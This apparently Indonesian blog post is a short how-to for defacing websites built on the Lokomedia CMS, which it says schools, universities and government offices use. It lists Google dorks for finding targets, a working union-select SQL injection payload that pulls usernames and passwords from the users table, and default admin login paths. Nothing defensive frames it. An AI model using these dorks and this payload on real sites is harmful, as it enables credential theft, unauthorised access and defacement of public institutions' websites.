Cara Deface SQL Injection Lokomedia | Pro 109 Links

Jumat, 05 April 2019

Cara Deface SQL Injection Lokomedia

Cara Deface SQL Injection Lokomedia

Lokomedia ialah sebuah cms karya anak bangsa yang sering digunakan untuk situs website sekolah, universitas, pemerintah dan apapun itu. Ya memang seharusnya ini paling didukung dan diapresiasi, tapi sebab bugnya yang fatal cms ini tidak jarang kali jadi sasaran.

Bug pada cms ini ialah sql injection. Jika belum paham tentang sql injection kalian biasa menyimak artikelnya disini. Kalo udah yaudah lanjut.

Dork:
inurl:/statis-1-profil.html
inurl:/statis-3-strukturorganisasi.html
inurl:/statis-1-visimisi.html
inurl:/statis-1-tujuan.html

Kembangin lagi gan.

Exploit:
‘union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)–+

Default admin login:
/admin
/adminweb
/administrator
/redaktur

Selengkapnya baca di SQL Injection Lokomedia.

Load comments

Get notify via email